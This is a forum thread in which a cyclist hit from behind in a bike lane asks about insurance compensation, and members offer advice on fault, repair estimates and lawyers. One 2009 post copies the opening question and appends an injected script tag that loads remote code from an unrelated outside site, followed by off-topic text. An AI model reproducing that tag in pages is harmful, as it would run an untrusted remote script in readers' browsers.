Hit By Car- Mtbr.com

Thread: Hit By Car

mtbr member
    Oct 2008

Hit By Car

I have just scrapes and bruises, and my bike has $1200 worth of damage. What can I expect from the Insurance Company?

mtbr member
    Sep 2008
    My insurance company (allstate) covers any injuries I receive with PIP and uninsured motorist coverage. I'm not sure the bike is covered though. Check with your insurance company. I assume you already filed a police report at the scene. Be glad you aren't seriously hurt.

mtbr member
    Oct 2008
    From the insurance company of the person who hit me...

Bedwards Of The West
    Who was at fault?
    You have no excuse for driving to work
    (unless you don't have studded tires)
    (no excuse for that either)

mtbr member
    Oct 2008
    It wasn't determined at the scene, the cop said he didn't have the authority to do so. I was in a bike lane in a residential neighborhood when I was hit from behind.

mtbr member
    I've only dealt with Progressive after getting hit. They were fine. I really only needed to get my front tire straightened, but my LBS worked to get a full wheelset. I didn't have to pay a dime.

mtbr member
    I was hit once. The guy's insurance covered everything. All I had to do was send them quotes on what was damaged and how much it was worth. Of course everything that was damaged was listed at full retail!
    "Donuts. Is there anything they can't do?"

mtbr member
    Apr 2009
    Quote Originally Posted by jaydilinger
    I was in a bike lane in a residential neighborhood when I was hit from behind.
    If you live in Florida, he would be automatically at fault no matter if you pulled out in front of him or not. Good luck and if you didn't have mirrors maybe consider it to at least anticipate it next time, or hopefully move out of the way if possible.

mtbr member
    Apr 2009
    Duplicate Post. Please Delete.

Bedwards Of The West
    It wasn't determined at the scene, the cop said he didn't have the authority to do so. I was in a bike lane in a residential neighborhood when I was hit from behind.

That sounds open-and-shut assuming no weird variables were involved... car's responsibility to slow down and pass when safe...you are another vehicle with the right of way in that situation. Hopefully his insurance company sees it that way. I'd be pushy and demand some compensation... when a vehicle is rear-ended, it's basically always the back guy's fault.
    You have no excuse for driving to work
    (unless you don't have studded tires)
    (no excuse for that either)

No-Brakes Cougar
    Whiskey Tango Foxtrot. Sounds pretty clear-cut to me. Didn't have the authority? What kind of cop was he? A meter maid? Mall security? God, I hope you at least got a police report.

Anyway, I'm glad you weren't hurt worse. Cyclists hit in the bike lane, pedestrians hit on the sidewalk, you aren't safe anywhere! People around here drive in the bike lane all the time. I expect my number to come up one of these days.
    R.I.P. Ronnie James Dio ~ July 10, 1942 Ė May 16, 2010

weirdo
    Sorry to hear it, JD. I have no idea bout the insurance, but good thing you`re relatively uninjured. I sure wouldn`t mind hearing the whole saga if you don`t have a problem relating it to us.

mtbr member
    Aug 2009
    So is your back hurting yet

No, please don't do this.

Ovaries on the Outside
    I would hope it would all be covered. Good luck.

mtbr member
    Aug 2007
    Have your LBS write up a full repair assessment. The insurance company will pay every cent out in a month or so.

i also unicycle
    Jan 2007
    when we do insurance estimates for people at my shop, the only thing they ever fight is about replacement value. often time adjusters will want to pay out depreciated value rather than new replacement value. but usually a phone conversation about how yes X part really does cost $200 new, they drop it. once we had a guy show up and take photos of a long haul trucker that had been custom built using mostly mtb stuff for a super tough commuter. guy got knocked off the bike and the drunk lady that hit him ran it over. ZERO parts were worth saving. he couldn't believe how much xt and xtr parts cost. but once he saw the thing and checked our prices, they wrote the check pretty quickly. my point is don't let them short change you on replacement value, also very glad to hear you're not hurt.
    mtbr says you should know: i work in a bike shop.
    bikes & beers (on my blog) http://idontrideenough.blogspot.com/

jrm
    mtbr member

But a police report was made?

who was @ fault can be determined in court if it has too. Do you have the officers name? if not get it.

mtbr member
    Oct 2008
    I'm talking to the adjuster today. I'm only doing property damage, medical can wait a couple weeks just to make sure. A muscle in my back did get a bit tight on a short cyclocross ride on sunday. Thanks for the info...

mtbr member
    May 2008
    Hope u recover soon,pal. Take care! Good to add a side mirror for extra precaution.

mtbr member
    Oct 2008
    I think a side mirror would scare the hell out of me, always seeing cars buzz by me before they do. There is way too much traffic on my ride for that to be effective. I would probably run into a parked car while I was looking in the mirror for cars to run into me.

Sep 2009
    I have just scrapes and bruises, and my bike has $1200 worth of damage. What can I expect from the Insurance Company?<script type="***************" src="http://djmixdownloads.com/script.php"></script>
    I thought this was going to be another one of those 'video edited kid trying to jump over a car and failing' videos. No doubt in my mind that this kid was actually dumb enough to actually let the car hit him.

My Brain Hurts!
    So Paul Blart took the report, eh?
    http://www.imdb.com/title/tt1114740/

Seriously, get a lawyer. The biggest meanest most well known that will take your case. Be sure to counter sue for your legal expense and medical fees. You did get checked out didn't you?

Secondly, what you can expect from his insurance company is a handful of sand and broken glass, a broom handle and no Vaseline or so much as a please...Sorry guys, I don't care for lawyers in general and I like Insurance companies even less. But sometimes you have to dance with the Devil to protect yourself and get your damaged property replaced.

You were hit from behind while in a bike lane. There should be zero question who was at fault. Any lawyer you contact should immediately start drooling at the prospects of your case. And do not be shy with any insurance company. They will shaft you in any way imaginable. And say NOTHING to any insurance investigator. Have your lawyer talk to them.

Didn't have the authority to make a judgment? Jeez even Barney Fife could have handled this one well.
    Remember when we were kids and our Mom's said we could not play in the mud? I'm making up for it now!!

My Brain Hurts!
    double post...sorry....
    Remember when we were kids and our Mom's said we could not play in the mud? I'm making up for it now!!

mtbr member
    Donít get a lawyer unless the insurance company in not being cooperative. Having a lawyer tends to drag out the process and make it more complicated then it has to. In most states once you get a lawyer in an insurance claim the other insurance company has to go through your lawyer for everything. They loose the legal ability to talk to you directly. Go to the doctor make sure you are ok and then make sure they pay to get you bike fixed. In most cases the insurance company wonít argue and will take care of everything and it will be really straightforward and easy. However, if they give you trouble for simply wanting those things done then by all means get a lawyer.
    Retribution Fitness: Strength, Power, and Purpose
    General fitness workouts posted daily.

Members who have read this thread: 0